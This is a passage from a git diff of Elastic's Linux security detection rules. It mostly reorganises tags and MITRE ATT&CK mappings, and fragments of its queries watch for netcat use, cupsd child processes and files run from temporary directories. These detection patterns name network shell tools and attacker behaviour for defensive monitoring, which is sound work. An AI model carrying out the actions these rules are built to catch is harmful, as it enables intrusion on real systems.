"https://attack.mitre.org/techniques/T1057/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_security_file_access_via_common_utility.toml b/rules/linux/discovery_security_file_access_via_common_utility.toml index cb7bc9afe40..c80d995820a 100644 --- a/rules/linux/discovery_security_file_access_via_common_utility.toml +++ b/rules/linux/discovery_security_file_access_via_common_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/12" [rule] author = ["Elastic"] @@ -83,7 +83,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,29 +125,6 @@ process.args like ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/linux/discovery_sudo_allowed_command_enumeration.toml b/rules/linux/discovery_sudo_allowed_command_enumeration.toml index aa6bd718253..9c5015f5db1 100644 --- a/rules/linux/discovery_sudo_allowed_command_enumeration.toml +++ b/rules/linux/discovery_sudo_allowed_command_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -106,13 +106,14 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/linux/discovery_suid_sguid_enumeration.toml b/rules/linux/discovery_suid_sguid_enumeration.toml index 4d18a674e20..ce279082884 100644 --- a/rules/linux/discovery_suid_sguid_enumeration.toml +++ b/rules/linux/discovery_suid_sguid_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/24" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -80,7 +80,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -105,3 +113,29 @@ reference = "https://attack.mitre.org/techniques/T1083/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml index 3a9839168b7..e78382373b9 100644 --- a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml +++ b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -87,7 +87,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Command and Control", + "Tactic: Reconnaissance", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -103,24 +112,37 @@ not (process.name in ("nc.traditional", "nc", "ncat", "netcat") and process.args framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1040" -name = "Network Sniffing" -reference = "https://attack.mitre.org/techniques/T1040/" +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/linux/discovery_suspicious_which_command_execution.toml b/rules/linux/discovery_suspicious_which_command_execution.toml index 5012b1d148f..732545b5d3b 100644 --- a/rules/linux/discovery_suspicious_which_command_execution.toml +++ b/rules/linux/discovery_suspicious_which_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -84,13 +84,14 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/linux/discovery_unusual_user_enumeration_via_id.toml b/rules/linux/discovery_unusual_user_enumeration_via_id.toml index 21c52e8d1b2..e855e9a3297 100644 --- a/rules/linux/discovery_unusual_user_enumeration_via_id.toml +++ b/rules/linux/discovery_unusual_user_enumeration_via_id.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -105,24 +105,9 @@ sequence by host.id, process.parent.entity_id with maxspan=1s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique.subtechnique]] -id = "T1069.001" -name = "Local Groups" -reference = "https://attack.mitre.org/techniques/T1069/001/" - -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" - -[[rule.threat.technique.subtechnique]] -id = "T1087.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1087/001/" +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml index d333b15eb7c..db90a1ad7af 100644 --- a/rules/linux/discovery_virtual_machine_fingerprinting.toml +++ b/rules/linux/discovery_virtual_machine_fingerprinting.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -104,7 +104,17 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -128,32 +138,9 @@ process.args in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" - -[[rule.threat.technique.subtechnique]] -id = "T1497.001" -name = "System Checks" -reference = "https://attack.mitre.org/techniques/T1497/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" - -[[rule.threat.technique.subtechnique]] -id = "T1497.001" -name = "System Checks" -reference = "https://attack.mitre.org/techniques/T1497/001/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_yum_dnf_plugin_detection.toml b/rules/linux/discovery_yum_dnf_plugin_detection.toml index 16b1effaea4..2d0397313ad 100644 --- a/rules/linux/discovery_yum_dnf_plugin_detection.toml +++ b/rules/linux/discovery_yum_dnf_plugin_detection.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -113,14 +113,9 @@ not ?process.parent.executable == "/usr/lib/venv-salt-minion/bin/python.original framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - -[[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml index f73a2c08c13..6310d47ea9b 100644 --- a/rules/linux/execution_abnormal_process_id_file_created.toml +++ b/rules/linux/execution_abnormal_process_id_file_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -97,7 +97,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Elastic Endgame"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -135,19 +144,15 @@ file.extension:(pid or lock or reboot) and file.path:(/var/run/* or /run/*) and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml index afd71b6364b..ecf13768813 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -123,16 +123,6 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" diff --git a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml index 7a0b343479e..e3029462837 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -103,7 +103,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Crowdstrike", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Execution", + "Data Source: Crowdstrike", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -123,29 +135,11 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml index 9e4b83c0aab..9a89825b302 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -132,18 +132,14 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml index 63b6636a9ca..21393246708 100644 --- a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml +++ b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -103,7 +103,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -137,31 +148,14 @@ process.parent.name in ("foomatic-rip", "cupsd") and process.command_line like ( [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml index a1c87d57ec2..4f987d0a01c 100644 --- a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml +++ b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ Containers, often used for deploying applications, start with an entrypoint scri risk_score = 47 rule_id = "c75d0c86-38d6-4821-98a1-465cff8ff4c8" severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -78,19 +86,6 @@ sequence by host.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -105,3 +100,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/execution_executable_stack_execution.toml b/rules/linux/execution_executable_stack_execution.toml index e06b6cc1346..db15ac7e5ad 100644 --- a/rules/linux/execution_executable_stack_execution.toml +++ b/rules/linux/execution_executable_stack_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/22" [rule] author = ["Elastic"] @@ -88,3 +88,20 @@ In Linux environments, processes with executable stacks can pose security risks - Implement stack protection mechanisms such as stack canaries or non-executable stack configurations to prevent future exploitation. - Escalate the incident to the security operations team for further investigation and to assess the need for additional security measures.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_file_execution_followed_by_deletion.toml b/rules/linux/execution_file_execution_followed_by_deletion.toml index 4b8060d9d8e..d2a3a87c967 100644 --- a/rules/linux/execution_file_execution_followed_by_deletion.toml +++ b/rules/linux/execution_file_execution_followed_by_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, user.id with maxspan=1m @@ -102,37 +109,6 @@ sequence by host.id, user.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" - -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" diff --git a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml index 79c6860fe6c..18431eba5ca 100644 --- a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml +++ b/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -92,6 +100,19 @@ process.args like ("/dev/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml index 717371ec75b..59cdf65a41e 100644 --- a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml +++ b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/15" [rule] author = ["Elastic"] @@ -116,7 +116,18 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Exfiltration", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -136,24 +147,6 @@ process.args like~ ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -168,16 +161,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = 